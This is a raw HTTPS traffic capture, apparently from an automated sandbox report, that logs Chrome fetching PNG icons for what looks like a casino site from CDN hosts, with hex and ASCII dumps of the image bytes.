                                                                                                                                                          2024-06-09 22:41:23 UTC1877INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 18 00 00 00 18 08 06 00 00 00 e0 77 3d f8 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 05 c7 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 31 2d 63 30 30 31 20 37 39 2e 61 38 64 34 37 35 33 34 39 2c 20 32 30 32 33 2f 30 33 2f 32 33 2d 31 33 3a 30 35 3a 34 35 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66
                                                                                                                                                          Data Ascii: PNGIHDRw=pHYsiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:45 "> <rdf


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          678192.168.2.55046223.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:23 UTC605OUTGET /pc/image-pc/index/382/slot/10044.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://xpj723.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:23 UTC614INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:23 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 2009
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 26 Jul 2023 04:33:16 GMT
                                                                                                                                                          ETag: "64c0a20c-7d9"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE1[2],EU-GER-frankfurt-EDGE4-CACHE1[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE9[3],EU-FRA-paris-GLOBAL1-CACHE17[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2473788
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 306fd05abac18dcaa32e24e8b3ec2702
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 118212
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:23 UTC2009INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 18 00 00 00 18 08 06 00 00 00 e0 77 3d f8 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 05 c7 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 31 2d 63 30 30 31 20 37 39 2e 61 38 64 34 37 35 33 34 39 2c 20 32 30 32 33 2f 30 33 2f 32 33 2d 31 33 3a 30 35 3a 34 35 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66
                                                                                                                                                          Data Ascii: PNGIHDRw=pHYsiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:45 "> <rdf


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          679192.168.2.55046090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:23 UTC610OUTGET /pc/image-pc/index/383/footer/icon1.png HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://wns732.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:23 UTC615INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:23 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 2171
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Tue, 25 Jul 2023 09:14:15 GMT
                                                                                                                                                          ETag: "64bf9267-87b"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE2[4],EU-GER-frankfurt-EDGE5-CACHE6[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE17[3],EU-FRA-paris-GLOBAL1-CACHE18[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2467536
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 679434eb72e933b60314c86d4d27f09a
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 124464
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:23 UTC2171INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 24 00 00 00 25 08 02 00 00 00 a5 3e dc 6a 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 26 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20
                                                                                                                                                          Data Ascii: PNGIHDR$%>jtEXtSoftwareAdobe ImageReadyqe<&iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          680192.168.2.55046323.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:23 UTC380OUTGET /pc/image-pc/index/383/header_icon.png HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:23 UTC613INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:23 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 722
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Tue, 25 Jul 2023 09:14:16 GMT
                                                                                                                                                          ETag: "64bf9268-2d2"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE2[3],EU-GER-frankfurt-EDGE4-CACHE2[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE9[2],EU-FRA-paris-GLOBAL1-CACHE21[0,TCP_HIT,0],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2464726
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 436b5a775849e79ba36dea8db4011dca
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 127274
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:23 UTC722INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 0e 00 00 00 11 08 03 00 00 00 da 16 6d ad 00 00 01 7d 50 4c 54 45 00 00 00 4c 8a 4f 63 95 6b 55 90 6f 48 85 54 6a 98 6a 3f 80 58 5a b9 c8 ba 9e 0f 68 b2 77 af a6 29 af a5 1d 91 ad 5a 72 ac 80 97 a4 44 87 a4 3d a1 a2 2d a0 a1 24 68 a0 68 61 9f 5d 6b 96 8b 75 95 75 71 8b 71 5b 73 60 42 49 4d 4b 47 32 00 00 01 71 92 71 63 81 5f 08 04 01 01 04 01 9c 65 02 b9 7f 01 b8 7e 01 d1 93 00 10 45 8d 24 16 02 b6 7b 01 b0 74 01 d8 9c 00 56 2a 00 65 8d 80 62 7f 59 09 2a 3f 65 8e 2e 01 0a 10 33 1d 03 a9 72 02 a6 6e 02 a3 6b 02 98 61 02 91 5d 02 81 51 02 13 0d 02 c6 8c 01 9e 68 01 8d 58 01 78 47 01 e0 a0 00 d9 98 00 98 59 00 95 48 00 2a 17 00 38 8c a5 56 91 9a 5b 8c 8d 57 82 8d 2a 61 8a 1f 67 87 67 90 78 57 76 76 6c
                                                                                                                                                          Data Ascii: PNGIHDRm}PLTELOckUoHTjj?XZhw)ZrD=-$hha]kuuqq[s`BIMKG2qqc_e~E${tV*ebY*?e.3rnka]QhXxGYH*8V[W*aggxWvvl


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          681192.168.2.55046523.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:23 UTC380OUTGET /pc/image-pc/index/383/login/icon1.png HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:23 UTC615INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:23 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 1231
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Tue, 25 Jul 2023 09:14:19 GMT
                                                                                                                                                          ETag: "64bf926b-4cf"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE2[4],EU-GER-frankfurt-EDGE4-CACHE1[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE10[2],EU-FRA-paris-GLOBAL1-CACHE18[0,TCP_HIT,0],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2464726
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 1a6c87f69b5871514d7ba422c7f3a993
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 127274
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:23 UTC1231INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 0d 00 00 00 0f 08 06 00 00 00 3f 23 45 77 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 26 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20
                                                                                                                                                          Data Ascii: PNGIHDR?#EwtEXtSoftwareAdobe ImageReadyqe<&iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          682192.168.2.55045990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:23 UTC610OUTGET /pc/image-pc/index/383/footer/icon2.png HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://wns732.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:23 UTC614INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:23 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 2164
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Tue, 25 Jul 2023 09:14:15 GMT
                                                                                                                                                          ETag: "64bf9267-874"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE1[2],EU-GER-frankfurt-EDGE5-CACHE6[0,TCP_HIT,1],EU-FRA-paris-GLOBAL1-CACHE29[2],EU-FRA-paris-GLOBAL1-CACHE6[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2467536
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 6a3e64f316277c313b59792ee4ba1a0c
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 124464
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:23 UTC2164INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 24 00 00 00 25 08 02 00 00 00 a5 3e dc 6a 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 26 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20
                                                                                                                                                          Data Ascii: PNGIHDR$%>jtEXtSoftwareAdobe ImageReadyqe<&iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          683192.168.2.55046423.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:23 UTC385OUTGET /pc/image-pc/index/383/login/password_n.png HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:23 UTC614INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:23 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 503
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Tue, 25 Jul 2023 09:14:20 GMT
                                                                                                                                                          ETag: "64bf926c-1f7"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE2[3],EU-GER-frankfurt-EDGE4-CACHE2[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE20[2],EU-FRA-paris-GLOBAL1-CACHE29[0,TCP_HIT,0],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2464726
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 7f9562c5baf137fe787da46657e71307
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 127274
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:23 UTC503INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 14 00 00 00 14 08 06 00 00 00 8d 89 1d 0d 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 01 a9 49 44 41 54 38 8d 9d d5 31 68 13 71 14 c7 f1 8f d7 10 ec 20 84 20 52 4d 48 a1 64 10 1d 8a a8 50 c7 d6 b5 48 2b 55 e8 26 b8 9a c1 0e 16 17 b7 8a 5a 44 87 76 d3 ad 4b 0d d5 8a a2 5b e7 22 8a e2 20 08 41 a4 5a 3b a8 25 b8 d4 08 82 c3 5d 20 8d 77 b9 a3 3f f8 c3 f1 bf df fb be c7 ff fe ef dd be 87 77 a7 c5 28 8f 89 68 9d c1 11 fc c1 57 bc c5 13 3c 8d f6 76 29 17 03 9b c4 1d 54 63 92 1c 8d d6 34 1a 98 c5 e3 4e 53 d0 f1 dc 87 db 91 a1 1b 16 a7 2a 56 a2 98 be b8 0a 6f e2 5a 06 50 b7 da 31 b3 9d 15 4e ed 11 d6 09 9d 6a 03 f3 b8 d7 cb 5d 19 1a 71 a8 74 3c 0d 7a 1f f9 1c 2e a0 1c e7 28 14 2b 46
                                                                                                                                                          Data Ascii: PNGIHDRpHYsIDAT81hq RMHdPH+U&ZDvK[" AZ;%] w?w(hW<v)Tc4NS*VoZP1Nj]qt<z.(+F


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          684192.168.2.55046790.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:23 UTC379OUTGET /pc/image-pc/index/312/nav/casino/03.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:23 UTC629INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:23 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 37611
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Fri, 06 Sep 2019 06:36:45 GMT
                                                                                                                                                          ETag: "5d71fe7d-92eb"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE5[2],EU-GER-frankfurt-EDGE5-CACHE3[0,TCP_HIT,0],EU-GER-frankfurt-GLOBAL1-CACHE4[300],EU-GER-frankfurt-GLOBAL1-CACHE14[0,TCP_HIT,300],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465102
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: d1a2df2a4d5c05d21c73cf272c9feba9
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 7105853
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:23 UTC15755INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 8b 00 00 00 8b 08 06 00 00 00 51 19 6a ff 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 06 62 4b 47 44 00 00 00 00 00 00 f9 43 bb 7f 00 00 80 00 49 44 41 54 78 da ec fd 75 bc 64 c7 75 ef 0d 7f ab 6a 53 e3 61 18 26 b1 66 c4 cc b2 65 90 4c 71 0c 31 cb 28 4b 86 d8 b9 a1 1b b8 71 92 7b 13 87 13 c7 4e cc cc 89 63 b6 2c 8b c9 62 8d 68 40 23 0d 9e a1 c3 d0 b8 a1 e0 fd 63 77 9f 99 91 51 96 ed dc f7 79 9e d2 67 4b ea 73 fa 74 d7 ae bd 6a d5 82 df fa 2d c1 7f f3 90 c8 ff e6 09 78 d8 70 05 67 bc e6 fd c3 ad a1 13 36 cf 86 c5 41 61 0d 83 f5 f9 fa 12 b3 6f fd f5 1f ba 66
                                                                                                                                                          Data Ascii: PNGIHDRQjgAMAa cHRMz&u0`:pQ<bKGDCIDATxudujSa&feLq1(Kq{Nc,bh@#cwQygKstj-xpg6Aaof
                                                                                                                                                          2024-06-09 22:41:24 UTC16384INData Raw: 36 5a 8c d1 79 cb 16 01 42 3a 24 0a e1 74 07 e7 e2 a1 75 4e 05 26 a5 c0 5a d1 85 4e 00 79 0d 52 a1 50 a0 dd 6e 93 a6 29 85 42 99 2c 4d 75 92 24 99 b1 a6 67 7e 61 21 2a 86 51 ce e3 fb cb 8b 61 1e 6b 45 5e c8 67 84 c7 37 3f f7 d5 49 d4 30 84 45 68 36 79 ee 5b 5e 5b 9a 9f da 95 dd f7 dd ff 4a d1 09 16 81 d7 29 31 33 56 81 b0 cc fe e0 3f 4d bc 7a 8d 3d f1 0d bf 5d f4 50 21 06 d1 4f 12 cf 13 d7 3b 05 60 32 27 d9 15 39 2f 58 6f a5 b7 e2 05 2b cf bb e0 ad 7f ed cd 04 eb b4 1f 30 37 ff c8 d7 ef 1f fb c1 a7 3a f8 85 dc 23 b9 f5 b6 db 2a 38 53 ed 50 06 e7 d8 da 2e f5 c3 af 68 74 cf f7 6e d8 bb a3 86 53 29 65 3c 3a 3a 2a 7b 7d f9 10 b5 d9 12 70 14 41 00 9e 47 1c c7 ec de b5 9b d1 a1 61 96 8f 8c e0 fb 1e 83 03 83 0c 0f 0d 62 b2 84 b9 99 69 b4 35 cc cc 2d 2c 66 c9 a5
                                                                                                                                                          Data Ascii: 6ZyB:$tuN&ZNyRPn)B,Mu$g~a!*QakE^g7?I0Eh6y[^[J)13V?Mz=]P!O;`2'9/Xo+07:#*8SP.htnS)e<::*{}pAGabi5-,f
